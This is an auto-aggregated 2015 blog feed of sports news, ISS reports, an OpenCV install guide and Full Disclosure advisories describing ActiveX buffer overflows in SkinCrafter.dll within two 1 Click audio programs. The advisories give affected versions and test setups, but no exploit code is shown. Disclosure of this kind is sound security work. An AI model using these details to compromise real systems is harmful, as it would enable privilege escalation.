Latest YouTube Video

Saturday, June 6, 2015

Orioles Video: Manny Machado hits solo HR in 3rd inning of 2-1 loss to Indians (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Associated Press Champions League final player rankings

BERLIN (AP) AP player rankings out of 10 for both sides in the Champions League final following Barcelona's 3-1 win over Juventus on Saturday:

from FOX Sports Digital http://ift.tt/1F1Oa9h
via IFTTT

Luis Suarez scores decisive goal, still annoys

BERLIN (AP) Never one to avoid controversy, Luis Suarez came through for Barcelona just when it needed him most.

from FOX Sports Digital http://ift.tt/1ASM3d7
via IFTTT

Slick Barca cruise past Juventus to win Champions League

BERLIN (AP) Barcelona's mighty attacking trio of Lionel Messi, Luis Suarez and Neymar won the Champions League on Saturday with a 3-1 victory over Juventus that showed the beauty of fluent and attacking football after days of scandal that have tarnished the sport.

from FOX Sports Digital http://ift.tt/1dUXTcg
via IFTTT

Barcelona beats Juventus 3-1 in Champions League final

BERLIN (AP) Barcelona won the Champions League for the fourth time in a decade on Saturday, with Luis Suarez grabbing the crucial goal in a 3-1 victory over Juventus at the end of a season that began with the Uruguay striker serving a ban for biting.

from FOX Sports Digital http://ift.tt/1KMDb8M
via IFTTT

Barcelona wins Champions League final with 3-1 victory over Juventus

BERLIN (AP) Barcelona wins Champions League final with 3-1 victory over Juventus.

from FOX Sports Digital http://ift.tt/1KhccnH
via IFTTT

Conte calls up 6 Juve players for Croatia, Portugal games

ROME (AP) Six Juventus players will go directly from the Champions League final to join Italy's squad for upcoming matches against Croatia and Portugal.

from FOX Sports Digital http://ift.tt/1FB6KGX
via IFTTT

Barca deploys Messi, Suarez, Neymar vs Juventus in final

BERLIN (AP) Barcelona is deploying the formidable trio of Lionel Messi, Luis Suarez and Neymar up front against Juventus in the Champions League final.

from FOX Sports Digital http://ift.tt/1MdVELL
via IFTTT

The Latest: Barcelona, Juventus lineups for CL final

BERLIN (AP) The Latest from the Champions League final:

from FOX Sports Digital http://ift.tt/1Gge0f8
via IFTTT

The Latest: Soccer, not sordid politics, shine at CL final

BERLIN (AP) The Latest from the Champions League final:

from FOX Sports Digital http://ift.tt/1Gg7y7T
via IFTTT

Barca's fearsome front 3 firing the side to success

BERLIN (AP) The most fearsome attack in world football has fired Barcelona to the verge of its fourth Champions League title in a decade. Lionel Messi, Luis Suarez and Neymar have scored 25 of Barcelona's 28 goals on the way to the final and few are betting against them leading the club to a record second treble on Saturday.

from FOX Sports Digital http://ift.tt/1Mw4aGO
via IFTTT

UK's David Cameron urges global fight against corruption

LONDON (AP) British Prime Minister David Cameron says the bribery scandal engulfing soccer's governing body should spur world leaders to tackle corruption in governments, businesses and international organizations.

from FOX Sports Digital http://ift.tt/1T3hV4q
via IFTTT

Anonymous

... SAT Critical Reading: 0; SAT Math: 0; SAT Writing: 0; Combined SAT: 0; Selectivity Index™: 268. Anonymous has not listed any extracurriculars.

from Google Alert - anonymous http://ift.tt/1G1Y8vl
via IFTTT

Man who led IOC scandal probe: 'It may be too late for FIFA'

LONDON (AP) As FIFA tries to clean up its image amid the ongoing corruption scandal, the IOC is being held as a model to follow.

from FOX Sports Digital http://ift.tt/1QziK0K
via IFTTT

J-League side Cerezo opts not to extend Forlan's contract

OSAKA, Japan (AP) Uruguay forward Diego Forlan will not be offered a contract extension, the president of his J-League second-division side Cerezo Osaka said Saturday.

from FOX Sports Digital http://ift.tt/1ARuoma
via IFTTT

Is China Behind the Massive Data Theft of 4 Million U.S. Officials?

The US federal agency has notified its 4 Million current and former government employees that their private data has been compromised in a massive data breach. Hackers managed to break into US government computer systems in the Office of Personnel Management (OPM) and steal records of Millions of employees, making it one of the largest known breaches of information ever on federal workers.


from The Hacker News http://ift.tt/1Judwo9
via IFTTT

Eight-month-old BC girl denied anonymous liver transplant in Alberta

EDMONTON - A public appeal made on behalf of a family looking for a person willing to donate a portion of their liver for an ailing eight-month-old girl ...

from Google Alert - anonymous http://ift.tt/1ARhNPI
via IFTTT

Benfica coach stuns fans by moving to rival Sporting

LISBON, Portugal (AP) Benfica coach Jorge Jesus is quitting the club he led to the Portuguese title in the last two seasons and moving to fierce crosstown rival Sporting Lisbon in an unprecedented switch that stunned fans.

from FOX Sports Digital http://ift.tt/1IrGTam
via IFTTT

Beware! Facebook UnfriendAlert Software Steals Your Account Password

Today everybody wants to know — Who visited my Facebook profile?, Who unfriended me from the Facebook Friend list?, Who saw my Facebook posts?, and many other features that isn't provided by Facebook by default. So most Facebook users try to find out a software and fall victim to one that promises to accomplish their desired task. Hackers make use of this weakness and often design


from The Hacker News http://ift.tt/1Ju0HKx
via IFTTT

Former South American soccer boss mired in FIFA scandal

ASUNCION, Paraguay (AP) The power that Nicolas Leoz had as the long-time leader of South American football is captured by a plaque in front of the headquarters of his previously impenetrable soccer kingdom.

from FOX Sports Digital http://ift.tt/1KT6vhb
via IFTTT

Sepp Blatter has a sanctuary in hometown of Visp

VISP, Switzerland (AP) Nestled in the Swiss mountains, the little town of Visp is far from the hustle and bustle of Zurich and the home of FIFA.

from FOX Sports Digital http://ift.tt/1QywLfe
via IFTTT

Portugal sets the pace at Under-20 World Cup

WELLINGTON, New Zealand (AP) Portugal strode confidently into the knockout rounds of the FIFA Under-20 World Cup Saturday, beating Colombia 3-1 for its third-straight win to finish unbeaten atop Group C.

from FOX Sports Digital http://ift.tt/1RROVLm
via IFTTT

Green Flash at Moonrise


Follow a sunset on a clear day against a distant horizon and you might glimpse a green flash just as the Sun disappears, the sunlight briefly refracted over a long sight-line through atmospheric layers. You can spot a green flash at sunrise too. Pinpointing the exact place and time to see the rising Sun peeking above the horizon is a little more difficult though, and it can be harder still to catch a green flash from the fainter rising Moon. But well-planned snapshots did record a green flash at the Full Moon's upper edge on June 2nd, from the Roque de los Muchachos Observatory on the Canary Island of La Palma. Looking a little south of due east, this long telephoto view finds the rising Moon above mountains and a sea of clouds. In sunlit profile are the mountaintop Teide Observatory telescope domes on the island of Tenerife some 143 kilometers away. via NASA http://ift.tt/1MrUcWV

Friday, June 5, 2015

Orioles Highlight: Matt Wieters 2 H, 2 RBI in his 1st game since May 2014, Adam Jones tiebreaking HR in win over Indians (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

MLB: Orioles 3-time All-Star C Matt Wieters activated from 60-day DL; batting 5th in lineup Friday vs. Indians (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Irish unveil terms of secret FIFA cash deal over handball

DUBLIN (AP) Irish soccer chiefs disclosed documentary evidence Friday of how FIFA paid millions to buy Ireland's silence on the handball that cost the Irish a chance to reach the 2010 World Cup.

from FOX Sports Digital http://ift.tt/1F0rd6k
via IFTTT

Report: Neymar under investigation by Brazil tax authorities

RIO DE JANEIRO (AP) Barcelona star Neymar is reportedly being investigated by Brazilian tax authorities.

from FOX Sports Digital http://ift.tt/1Mcdqiv
via IFTTT

Anonymous & Anonymous

Anonymous & Anonymous. This conversation took place between two ICRC delegates who have visited places of detention all over the world.

from Google Alert - anonymous http://ift.tt/1H9Vp58
via IFTTT

Orioles: Brian Matusz's 8-game suspension for having a foreign substance on his arm has been upheld - CSNBaltimore.com (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

MLB: Mike Trout, Bryce Harper and Giancarlo Stanton first 3 picks in ESPN's MLB Franchise Draft; live in ESPN NOW (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Brad Guzan returns to US lineup for 1st time since November

AMSTERDAM (AP) Goalkeeper Brad Guzan returned to the U.S. lineup for the first time since November for Friday night's exhibition game at the sixth-ranked Netherlands.

from FOX Sports Digital http://ift.tt/1Js7a8N
via IFTTT

Berlusconi near to selling 48 percent of AC Milan

MILAN (AP) Silvio Berlusconi is close to selling a 48-percent stake in AC Milan to a Thai investor.

from FOX Sports Digital http://ift.tt/1cCh1u9
via IFTTT

Install OpenCV 3.0 and Python 2.7+ on OSX

Step 1:

Install Homebrew and update

$ cd ~
$ ruby -e "$(curl -fsSL http://ift.tt/YQTuQh)"
$ brew update

Step 2:

Install python

$ brew install python

Update

PATH
  in
~/.bash_profile
# Homebrew
export PATH=/usr/local/bin:$PATH

Reload

~/.bash_profile
$ source ~/.bash_profile

Confirm version of Python:

$ which python
/usr/bin/local/python

Step 3:

Install

virtualenv
  and
virtualenvwrapper
$ pip install virtualenv virtualenvwrapper

Update

~/.bash_profile
  again
# Virtualenv/VirtualenvWrapper
source /usr/local/bin/virtualenvwrapper.sh

Reload

~/.bash_profile

Create

cv
  virtual environment
$ mkvirtualenv cv

Step 4:

Install NumPy

$ pip install numpy

Step 5:

Use brew to install required developers tools and packages

$ brew install cmake pkg-config

Install the necessary image I/O packages. These packages allow you to load various image file formats such as JPEG, PNG, TIFF, etc.

$ brew install jpeg libpng libtiff openexr

Install libraries that are used to optimize various operations within OpenCV:

$ brew install eigen tbb

Step 6:

Grab OpenCV from GitHub and checkout the 3.0.0 version:

$ cd ~
$ git clone http://ift.tt/1jCrzMq
$ cd opencv
$ git checkout 3.0.0

Pull down the

opencv_contrib
  repo which contains extra modules for OpenCV, such as feature detection and local invariant descriptors (SIFT, SURF, etc.), text detection in natural images, line descriptors, and more:
$ cd ~
$ git clone http://ift.tt/1sDkzzf
$ cd opencv_contrib
$ git checkout 3.0.0

Step 7:

Setup the OpenCV build:

$ cd ~/opencv
$ mkdir build
$ cd build
$ cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local -D INSTALL_C_EXAMPLES=ON -D INSTALL_PYTHON_EXAMPLES=ON  -D BUILD_EXAMPLES=ON -D OPENCV_EXTRA_MODULES_PATH=~/opencv_contrib/modules ..

***I THINK ffmpeg MIGHT BE USEFUL HERE FOR VIDEO SUPPORT***

Compile OpenCV:

$ make

And assuming that OpenCV compiled without error, you can now install it on your OSX system:

$ make install

If you get an error message related to permissions, you’ll need to run the install command as sudo:

$ sudo make install

 

The post Install OpenCV 3.0 and Python 2.7+ on OSX appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/1MbC2rQ
via IFTTT

Blatter's long goodbye fuels critics urging quick FIFA exit

GENEVA (AP) In soccer's version of the long goodbye, Sepp Blatter is staying put.

from FOX Sports Digital http://ift.tt/1Gp72qb
via IFTTT

Former South American soccer boss mired in FIFA scandal

ASUNCION, Paraguay (AP) The power that Nicolas Leoz had as the long-time leader of South American football is captured by a plaque in front of the headquarters of his previously impenetrable soccer kingdom.

from FOX Sports Digital http://ift.tt/1ASiDvs
via IFTTT

US loses 3-0 to Ukraine at Under-20 World Cup

WELLINGTON, New Zealand (AP) Already assured a berth in the second round, the United States completed the group stage of the Under-20 World Cup with a 3-0 loss to Ukraine on Friday in Auckland.

from FOX Sports Digital http://ift.tt/1Gp498G
via IFTTT

Ninis recalled by Greece for Euro qualifier vs Faeroes

ATHENS, Greece (AP) Greece coach Sergio Markarian has recalled midfielder Sotiris Ninis to the Greek national squad after a 19-month absence for a European championship qualifier in the Faeroe Islands, as the team struggles to regain form following a string of defeats.

from FOX Sports Digital http://ift.tt/1Qx1k4M
via IFTTT

Barca's fearsome front 3 firing the side to success

BERLIN (AP) The most fearsome attack in world football has fired Barcelona to the verge of its fourth Champions League title in a decade. Lionel Messi, Luis Suarez and Neymar have scored 25 of Barcelona's 28 goals on the way to the final and few are betting against them leading the club to a record second treble on Saturday.

from FOX Sports Digital http://ift.tt/1H9dpfV
via IFTTT

Ireland's players knew nothing about FIFA payment

DUBLIN (AP) Whether it was $5 million or 5 million euros, it seems none of the Ireland players knew about the secret payment made by FIFA to compensate the country for missing out on the 2010 World Cup after Thierry Henry's handball.

from FOX Sports Digital http://ift.tt/1FZWhHg
via IFTTT

In letter, South African official asks FIFA to channel funds

JOHANNESBURG (AP) A South African newspaper on Friday published a 2007 letter linking the country's chief World Cup organizer to a $10 million payment made to projects linked to Jack Warner, then a FIFA executive and now a suspect in a corruption probe.

from FOX Sports Digital http://ift.tt/1HQcOvH
via IFTTT

ISS Daily Summary Report – 6/04/2015

Fluid Shifts:  Today was the final day for the Fluid Shift operations in the Russian Service Module (SM) for Flight Day (FD) 45 sessions.  Kornienko donned the Lower Body Negative Pressure (LBNP/Chibis) device while Padalka, with ground support in Moscow, assisted in the medical monitoring.  While Kornienko was subjected to the negative pressure (pulling the fluid feetward), Kelly, with remote guidance in Houston, performed measurements with Distortion Product Otoacoustic Emissions (DPOAE), Optical Coherence Tomography (OCT), and Tonometry measurements. Fluid Shifts is a joint NASA-Russian experiment that investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is investigated as a possible intervention. Results from this study may help to develop preventative measures against lasting changes in vision and eye damage. Fine Motor Skills: Kelly performed his FD 70 Fine Motor Skills sessions this morning.  Fine motor skills are crucial for successful interaction with touch-based technologies, repairing sensitive equipment, and a variety of other tasks. In Fine Motor Skills, crew members perform a series of interactive tasks on a touchscreen tablet. The investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity.  Wearable Monitoring: Cristoforetti doffed and downlinked hardware from the Wearable Monitoring Vest that she wore overnight. This was the final of six planned sessions.  Wearable Monitoring validates a new cloth vest that monitors astronaut heart rates and breathing patterns during sleep. It collects data to investigate whether changes in heart activity are related to astronauts’ poor sleep quality. Current technology cannot check astronauts’ heart activity while they sleep because the test wakes them. The Wearable Monitor is a lightweight vest with silver wires and sensors embedded into the fabric, making it more comfortable to wear. Extravehicular Mobility Unit (EMU) 3010 Fan Pump Separator (FPS) Remove & Replace (R&R): Virts and Cristoforetti completed R&Ring the failed FPS in EMU 3010. Tomorrow they will pack the removed FPS for return on 41 Soyuz (41S). A return to service test for the suit is planned next week.  Today’s Planned Activities All activities were completed unless otherwise noted. Fluid Shifts config Fluid Shifts connecting equipment FLUID SHIFTS. РБС Power Outlet Activation PK-4 data hard drives exchange FLUID SHIFTS. Assistance with Chibis & Gamma-1 FLUID SHIFTS. КСПЭ hardware Deactivation and Closing Applications on ЦП SSC FLUID SHIFTS. Deactivation of РБС and demating hardware cables FLUID SHIFTS. Disconnecting HRF PC from ППС-26 and connecting RSE-Med Return to nominal config Replace battery pack in CDM, activate and don CDM for CDM Crew Worn session EHS Formaldehyde Monitoring Kit (FMK) Stow Operation EMU FPS R&R Part 2 KARDIOVEKTOR. Execution experiment  [Deferred] FLUID SHIFTS. RS HRF connection to ППС-26 (instead of RSE-Med) PCRF Maintenance Unit Relocation Recharging 41S Satelite Phone Making a documentary about life onboard the ISS Crew departure prep 41S Air Heater Fan MNT СОЖ maintenance Fine Motor Skills Experiment Test Subject Fluid Shifts OCT Service Module Setup Fluid Shifts OCT Service Module Power On Fluid Shifts CCFP Service Module Configuration Fluid Shifts DPOAE Service Module Setup Fluid Shifts Tonometry Service Module Setup Fluid Shifts Experiment Service Module Data Collection Operator Fluid Shifts CCFP And DPOAE Service Module End Fluid Shifts OCT Service Module Power Off Fluid Shifts Tonometry Service Module Stow Fluid Shifts OCT Service Module Stow Fluid Shifts CCFP And HRF PC Service Module Stow Twins Study Saliva Collection Setup PAO video recording RGN Recycle Tank Fill Valve maintenance of SM Rodnik system tanks Fluid Shifts Hardware RSOS Gather Fluid Shifts Hardware USOS Transfer PAO HD Config LAB Setup PAO Preparation PAO event VZAIMODEISTVIYE-2. Experiment Ops Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. Port SARJ and BGA2B return to autotrack post high beta. Three-Day Look Ahead: Friday, 06/05: EVA FPS pack for return, CARDOX ultrasound Saturday, 06/06: Crew off duty, housekeeping Sunday, 06/07: Rodents Research CASIS session QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1MsYQ6Y
via IFTTT

OBCrack on Twitter: "Anonymous: Cosima thinks Scott is too uptight. She introduces him to pot and ...

Anonymous: Cosima thinks Scott is too uptight. She introduces him to pot and it doesn't go as expected. #OrphanBlack http://pic.twitter.com/lJRoSQ9Izd.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/OBcrack/status/606617800921116672&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFyykpGOI4VrZqvXKx2txMlOUqBJw
via IFTTT

Argentina out and NZ through to playoffs at U20 World Cup

WELLINGTON, New Zealand (AP) Pre-tournament favorite Argentina was eliminated in the group stage at the Under-20 World Cup for the first time in 24 years after drawing 0-0 with Austria on Friday.

from FOX Sports Digital http://ift.tt/1BOCUwY
via IFTTT

How Apple Pay Can Be Hacked to Steal Your Credit Card Details

Today anywhere you go, you will come across Free or Public WiFi hotspots -- it makes our travel easier when we stuck without a data connection. Isn’t it? But, I think you’ll agree with me when I say: This Free WiFi hotspot service could bring you in trouble, as it could be a bait set up by hackers or cyber criminals to get access to devices that connects to the free network. <!--


from The Hacker News http://ift.tt/1cBS7e1
via IFTTT

OBCrack on Twitter: "Anonymous: Delphine sings Spice Girls songs in the shower, often gets the ...

Anonymous: Delphine sings Spice Girls songs in the shower, often gets the words wrong. #Orphanblack @EvelyneBrochu http://pic.twitter.com/2su9pIPFUh.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/OBcrack/status/606582987291914240&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNE4HxaQSCayoRaLQ7kVkfRKgRL5LA
via IFTTT

Juventus comeback complete after fixing downfall

BERLIN (AP) Less than 10 years ago, Juventus was battling for survival in the second division, tainted by an Italian football scandal. The comeback has been spectacular and could be crowned by the biggest prize in club competitions when Juve tackles Barcelona in the Champions League final on Saturday.

from FOX Sports Digital http://ift.tt/1FZqqqo
via IFTTT

I have a new follower on Twitter


Kyle
Big Data Analytics & Algorithmics guru. I also dabble with Business Intelligence. Will make you Famous & Tell you Why!
United States
http://t.co/mNLxjD3xe6
Following: 8376 - Followers: 9498

June 05, 2015 at 09:02AM via Twitter http://twitter.com/KyleTheQuant

Anonymous

... SAT Critical Reading: 0; SAT Math: 0; SAT Writing: 0; Combined SAT: 0; Selectivity Index™: 727. Anonymous has not listed any extracurriculars.

from Google Alert - anonymous http://ift.tt/1JvQbAN
via IFTTT

[FD] 1 Click Extract Audio v2.3.6 - Activex Buffer Overflow

Document Title: =============== 1 Click Extract Audio v2.3.6 - Activex Buffer Overflow References (Source): ==================== http://ift.tt/1ROZ9vT Video: http://ift.tt/1dRJIVp Release Date: ============= 2015-06-05 Vulnerability Laboratory ID (VL-ID): ==================================== 1506 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== How many times have you watched a video with a fantastic piece of music on it? Wouldn`t it be great if you could make an MP3 file to play on your computer, or MP3/media player? 1Click Extract Audio is a totally FREE audio extractor, which provides you a handy tool to extract audio/sound or background music from videos. One handy utility that everyone needs nowadays is a software program that can extract audio, sound, or background music from home movies, YouTube videos, or any other video file. With just one click, you can easily extract audio tracks from AVI, MPEG, MPG, FLV (Flash Video), DAT, WMV, MOV, MP4, 3GP video files and save them as MP3, WAV and AC3 formats. It also has the ability to extract audio from only a portion of the video, instead of the entire file. This is a very basic editing feature, but it’s really helpful because you don’t have to download any sound editing software if you want only some parts of the audio. (Copy of the Vendor Homepage: http://ift.tt/1dRJLk9 ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered an activex buffer overflow vulnerability in the official 1 Click Extract Audio v2.3.6 software. Vulnerability Disclosure Timeline: ================================== 2015-06-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DVDVideoTool Product: 1 Click Extract Audio - Software (Windows) 2.3.6 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ An activeX buffer overflow vulnerability has been discovered in the official 1 Click Extract Audio v2.3.6 software. The buffer overflow vulnerability can be exploited by local attackers to compromise a target system or to gain higher access privileges for further exploitation. The buffer overflow vulnerability is located in the COM component used by the product SkinCrafter.dll (dynamic library). The vulnerability is available with poc demo code and security video to demonstrate how to exploit the issue via activex component. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability results in system compromise by elevation of privileges via overwrite of the registers. Proof of Concept (PoC): ======================= The activex buffer overflow vulnerability can be exploited by local attackers without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1 Click Extract Audio Activex Buffer Overflow

Affected version=2.3.6

Vendor Homepage:http://ift.tt/1Jr8ed3

Software Link:http://ift.tt/1ROZ9MA

The vulnerability lies in the COM component used by the product SkinCrafter.dll

SkinCrafter.dll version.1.9.2.0

Vulnerability tested on Windows Xp Sp3 (EN),with IE6

Author: metacom
Security Risk: ============== The security risk of the activex buffer overflow vulnerability is estimated as high. (CVSS 6.1) Credits & Authors: ================== metacom (PwC New Zealand) - [http://ift.tt/1ROW2Et] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] 1 Click Audio Converter v2.3.6 - Activex Buffer Overflow

Document Title: =============== 1 Click Audio Converter v2.3.6 - Activex Buffer Overflow References (Source): ==================== http://ift.tt/1Jr68K9 http://ift.tt/1Jr690H View Video: https://www.youtube.com/watch?v=Ad0wHlHz0KU Release Date: ============= 2015-06-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1504 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== Looking for a free tool that can convert audio files from your extensive, wide-ranging collection into a format that plays on your iPhone? Or just about any device or player? 1Click Audio Converter is a free software designed for converting audio files from one format to another according to your wish and saving them to your hard drive. 1Click Audio Converter supports a wealth of audio formats, including MP3, WMA, WAV, M4A, iPhone Ringtone, OGG, AC3, and convert them to MP3, WAV and AC3. Using the program couldn`t be easier; you simply select the files they want to convert, choose the output format and destination folder, optionally adjust the bitrate or channel options, and Airy does the rest. It also has the ability to convert only a portion of an audio, instead of the entire file. This is a very basic editing feature, but it’s really helpful because you don’t have to download any sound editing software if you want only some parts of the audio. (Copy of the Vendor Homepage: http://ift.tt/1ROW0MP ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered an activex buffer overflow vulnerability in the official 1 Click Audio Converter v2.3.6 software. Vulnerability Disclosure Timeline: ================================== 2015-06-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DVDVideoTool Product: 1 Click Audio Converter - Software (Windows) 2.3.6 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ An activeX buffer overflow vulnerability has been discovered in the official 1 Click Audio Converter v2.3.6 software. The buffer overflow vulnerability can be exploited by local attackers to compromise a target system or to gain higher access privileges for further exploitation. The buffer overflow vulnerability is located in the COM component used by the product SkinCrafter.dll (dynamic library). The vulnerability is available with poc demo code and security video to demonstrate how to exploit the issue via activex component. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability results in system compromise by elevation of privileges via overwrite of the registers. Proof of Concept (PoC): ======================= The activex buffer overflow vulnerability can be exploited by local attackers without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Affected version=2.3.6

Vendor Homepage:http://ift.tt/1Jr8ed3

Software Link:http://ift.tt/1ROW0MT

The vulnerability lies in the COM component used by the product SkinCrafter.dll

SkinCrafter.dll version.1.9.2.0

Vulnerability tested on Windows Xp Sp3 (EN),with IE6

Author: metacom
Security Risk: ============== The security risk of the activex buffer overflow vulnerability is estimated as high. (CVSS 6.1) Credits & Authors: ================== metacom (PwC New Zealand) - [http://ift.tt/1ROW2Et] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] 1 Click Audio Converter v2.3.6 - Activex Buffer Overflow

Document Title: =============== 1 Click Audio Converter v2.3.6 - Activex Buffer Overflow References (Source): ==================== http://ift.tt/1Jr68K9 http://ift.tt/1Jr690H View Video: https://www.youtube.com/watch?v=Ad0wHlHz0KU Release Date: ============= 2015-06-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1504 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== Looking for a free tool that can convert audio files from your extensive, wide-ranging collection into a format that plays on your iPhone? Or just about any device or player? 1Click Audio Converter is a free software designed for converting audio files from one format to another according to your wish and saving them to your hard drive. 1Click Audio Converter supports a wealth of audio formats, including MP3, WMA, WAV, M4A, iPhone Ringtone, OGG, AC3, and convert them to MP3, WAV and AC3. Using the program couldn\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'t be easier; you simply select the files they want to convert, choose the output format and destination folder, optionally adjust the bitrate or channel options, and Airy does the rest. It also has the ability to convert only a portion of an audio, instead of the entire file. This is a very basic editing feature, but it’s really helpful because you don’t have to download any sound editing software if you want only some parts of the audio. (Copy of the Vendor Homepage: http://ift.tt/1ROW0MP ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered an activex buffer overflow vulnerability in the official 1 Click Audio Converter v2.3.6 software. Vulnerability Disclosure Timeline: ================================== 2015-06-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DVDVideoTool Product: 1 Click Audio Converter - Software (Windows) 2.3.6 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ An activeX buffer overflow vulnerability has been discovered in the official 1 Click Audio Converter v2.3.6 software. The buffer overflow vulnerability can be exploited by local attackers to compromise a target system or to gain higher access privileges for further exploitation. The buffer overflow vulnerability is located in the COM component used by the product SkinCrafter.dll (dynamic library). The vulnerability is available with poc demo code and security video to demonstrate how to exploit the issue via activex component. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability results in system compromise by elevation of privileges via overwrite of the registers. Proof of Concept (PoC): ======================= The activex buffer overflow vulnerability can be exploited by local attackers without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
